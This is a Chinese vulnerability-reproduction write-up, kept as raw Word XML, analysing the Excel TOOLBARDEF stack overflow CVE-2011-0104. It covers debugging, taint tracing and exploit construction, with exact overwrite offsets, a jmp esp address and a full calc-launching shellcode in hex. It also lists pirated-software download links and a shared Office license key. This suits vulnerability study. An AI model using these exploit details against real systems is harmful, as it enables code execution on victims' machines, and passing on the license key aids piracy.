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X439b30234b34bc621ab88a0ac728c3db2d0d150"/>
      <w:r>
        <w:t>cve-2011-0104 Microsoft Excel TOOLBARDEF Record栈溢出漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="测试环境"/>
      <w:r>
        <w:t>测试环境</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="2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836"/>
        <w:gridCol w:w="2888"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="24"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="24"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>推荐环境</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="24"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>版本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操作系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="24"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Windows XP Professional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="24"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Service Pack 3 (x86)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漏洞软件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="24"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Office</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="24"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>2003 Service Pack 3 (x86)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虚拟机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="24"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>VMware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="24"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>16.2.3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调试器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="24"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>OllyDBG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="24"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>2.0.1-32位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反汇编工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="24"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>IDA Pro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="24"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>6.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>影响范围：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="环境搭建"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Microsoft Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>环境搭建</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://msdn.itellyou.cn/" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
        </w:rPr>
        <w:t>https://msdn.itellyou.cn/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Windows XP Professional with Service Pack 3 (x86)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>ed2k://|file|zh-hans_windows_xp_professional_with_service_pack_3_x86_cd_x14-80404.iso|630239232|CD0900AFA058ACB6345761969CBCBFF4|/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t>需要先安装office标准版在利用补丁升级到sp3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Office Standard Edition 2003 (Simplified Chinese)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>ed2k://|file|sc_office_2003_std.iso|429031424|DB59D0F8CC31EF72CC15D675FC9B7C34|/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t>Office 2003 Service Pack 3 (x86)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>ed2k://|file|zh-Hans_office_2003_service_pack_3_x86.exe|142028200|93157828F4CDA043AD266EC492599111|/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>office2003通用密钥序列号</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>J2MV9-JYYQ6-JM44K-QMYTH-8RB2W</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="漏洞复现"/>
      <w:r>
        <w:t>漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t>打开样本exploit.xlb 出现报错</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4498975" cy="2440940"/>
            <wp:effectExtent l="0" t="0" r="15875" b="1651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>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="漏洞分析"/>
      <w:r>
        <w:t>漏洞分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t>打开excel，使用windbg附加，使用命令g，然后打开src.xlb文件，程序中断：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="3608705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中断在300e06f7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>查看栈里的数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="202628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266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可以看到大量的0x90字节覆盖了栈中的数据</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>利用ida打开excel.exe 查看包含地址 300e06f7 的函数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="3069590"/>
            <wp:effectExtent l="0" t="0" r="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6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4398645" cy="1049655"/>
            <wp:effectExtent l="0" t="0" r="1905" b="17145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包含该地址指令的函数开始地址为 300e05ad ,利用x32dbg，附加excel时在 300e05ad 处断点,然后运行程序，中断时在栈顶使用硬件断点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="2900045"/>
            <wp:effectExtent l="0" t="0" r="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001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点击运行，程序中断在了300DE834 rep movsd 指令上，这条指令时将esi地址处的数据复制到edi地址的地方，覆盖到了我们刚刚硬件断点的地方了，</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4196080" cy="2291080"/>
            <wp:effectExtent l="0" t="0" r="13970" b="1397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使用ida找到包含该地址指令的函数，使用F5查看伪代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>发现是由于memcpy在复制数据时发生的栈溢出，而复制长度v7 有两个数据来源，是取自（v4）和（v6-v5）中小的那一个，其中v4来自传入的参数a3，v6和v5是两个内存中的值，使用动调看看</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4899025" cy="3876675"/>
            <wp:effectExtent l="0" t="0" r="15875" b="9525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在300DE834 rep movsd 的上一条指令断点 再次附加样本，成功中断到300DE834 rep movsd 的上一条指令，但是ecx = 1 ，只是复制4个字节不是我们需要的，继续运行，看看下一个。</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="2780665"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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1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第二次复制时 ecx = 0xc0 根据rep movsd 每次复制4个字节 需要复制的数据大小为0xc0*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:bookmarkStart w:id="7" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:t xml:space="preserve"> = 0x300字节的数据 此时EDI = 0x001396bb + 0x300 = 0x001399bb 这次复制数据会溢出，导致程序会在300e06f7异常中断，异常中断时esp = 001396b0 ebp = 0013971c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="3056890"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr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70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5" w:name="污点追踪"/>
      <w:r>
        <w:t>污点追踪</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t>接下来就看看溢出长度0x300的来源，也就是污点追踪</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>我们在300DE7EC处断点 看看传入的参数（300DE7EC是发生复制数据溢出的函数的起始地址）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="2821305"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr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213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结合ida知道v4来自传入的参数a3，此时a3就是0x300 那我们根据返回地址 3070DF42 去上层函数看看，查看伪代码发现有6百多行，这里简单列出重点的地方</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">传入的a3 来自上层函数的v74 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>v74来自v13</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>v13的值来自于sub_300DE7C5函数的返回值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4666615" cy="2107565"/>
            <wp:effectExtent l="0" t="0" r="635" b="6985"/>
            <wp:docPr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现在去sub_300DE7C5函数看看，发现这个函数像是在从文件中读数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="5225415"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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254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我们下个断点在v13获取长度时，也就是地址3070DF16处看看，同时利用py-office-tools工具辅助查看数据复制的情况</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="1578610"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr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7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23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>C:&gt; python2 pyOffice.py -g src.xlb &gt; src.txt</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>[*]Opening file src.xlb</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>[*]Listing streams/storages:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>Warning: OLE type 0x8 not in types</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>[**]Detected Excel file src.xlb</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>********************************************************************************</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>[*]Dumping Workbook stream 0x3f7a (16250) bytes...</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>[ii]BOF record: current count 1</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>[0]Record BOF [0x809 (2057)] offset 0x0 (0), len 0x10 (16) (Beginning of File)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">        WORD vers = 0x600 (1536)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">        WORD dt = 0x400 (1024)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">        WORD rupBuild = 0x1faa (8106)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">        WORD rupYear = 0x7cd (1997)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">        DWORD bfh = 0x500c9 (327881)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">        DWORD sfo = 0x406 (1030)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>[1]Record TOOLBARDEF [0xa7 (167)] offset 0x14 (20), len 0x4 (4) (Toolbar Definition:)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">        BYTE fUnnamed = 0xb0 (176)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">        WORD cbtn = 0xc0f (3087)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">        Field 'rgbbtndef' is variable length, dumping rest of record:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">            0000000000   00                                                 .</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>[2]Record CONTINUE [0x3c (60)] offset 0x1c (28), len 0x300 (768) (Continues Long Records)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">        Field 'data' is variable length, dumping rest of record:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">            0000000000   40 DF D6 D5 3B DF D6 D5 3B 00 00 00 00 00 00 00    @...;...;.......</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">            0000000010   00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    ................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0000000020   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    ................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0000000030   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    ................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0000000040   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    ................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0000000050   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    ................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0000000060   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    ................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0000000070   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    ................</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">            0000000080   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    ................</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t>此时eax = 3F7A 和样本文件分析工具中 [*]Dumping Workbook stream 0x3f7a (16250) bytes... 一样 是从文件中读东西，索引值没有大于3F7A不会跳转</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="974090"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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742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从文件中读取到0x300放到eax返回，从这知道复制的长度0x300也是从文件中得到的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="2495550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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59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4"/>
    <w:bookmarkEnd w:id="5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="漏洞利用"/>
      <w:r>
        <w:t>漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t>知道0x300数据的来源，我们接着对异常发生那块进行研究，看看如何构造exp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>发生异常前 有一个比较函数 通过动调发现，esi恒等于0，我们可以控制eax等于0，跳过这块异常快速的返回 而eax就来自 ebp + 2c 也就是0x13971c + 0x2c = 0x139748 的位置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="2935605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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3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同时返回地址为0x139720处的数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="2902585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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026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开始构造exp，需要注意：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">0x139748地址保存的数需要为0 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>程序最后执行的返回指令是ret 0x2C，所以在返回地址的后面要预留0x2C字节</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>0x139720地址保存的数时jmp esp的地址 搜索得到 0x7C86467B处存有</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="2277110"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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776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也可以利用工具findjmp.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="1863725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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6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根据我们当时动调时的情况可以快速帮我确定覆盖地址 ，0x001396bb 开始覆盖</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="3056890"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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70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是从文件这里开始覆盖</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4508500" cy="3682365"/>
            <wp:effectExtent l="0" t="0" r="6350" b="13335"/>
            <wp:docPr id="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68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在文件中需要改成00000000 的地址为 0x139748 - 0x1396bb + 0x620 = 0x6ad</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>在文件中需要改成 0x7C86467B jmp esp的地址为 0x139720 - 0x1396bb + 0x620 = 0x685</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>shellcode需要插到0x6ad + 0x2c = 0x6d9的位置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>动态找api弹计算机shellcode:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>33C9648B41308B400C8B7014AD96AD8B5810538B533C03D38B527803D38B722003F333C941AD03C381384765745075F4817804726F634175EB8178086464726575E28B722403F3668B0C4E498B721C03F38B148E03D35B33C951B97865636151836C2403616857696E455453FFD233C951682E6578656863616C638BDC6A0553FFD0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="2488565"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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886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4721860" cy="2851785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
